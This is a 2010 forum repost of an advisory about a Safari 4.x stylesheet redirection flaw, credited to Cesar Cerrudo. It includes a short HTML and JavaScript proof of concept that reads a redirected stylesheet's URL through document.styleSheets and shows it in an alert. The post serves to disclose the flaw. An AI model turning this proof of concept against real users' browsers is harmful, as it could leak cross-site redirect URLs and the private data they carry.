Pages: [1]   Go Down
  Print  
Author Topic: Apple Safari Stylesheet Redirection vulnerability  (Read 701 times)
HCK
Global Moderator
Hero Member
*****
Posts: 79436



« on: April 21, 2010, 07:00:58 am »

Apple Safari Stylesheet Redirection vulnerability
      


There’s a 0-day vulnerability affecting Safari 4.x users, it’s not critical, but it is important to be aware of it.

<link rel="stylesheet" type="text/css" href="www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>
Listing 01 – Apple Safari Stylesheet Redirection PoC
Cesar Cerrudo has discovered this vulnerability, and discussed that Safari wasn’t able to display the LINK [...]
         

http://ithreats.net/2010/01/25/apple-safari-stylesheet-redirection-vulnerability/
      
Logged
Pages: [1]   Go Up
  Print  
 
Jump to: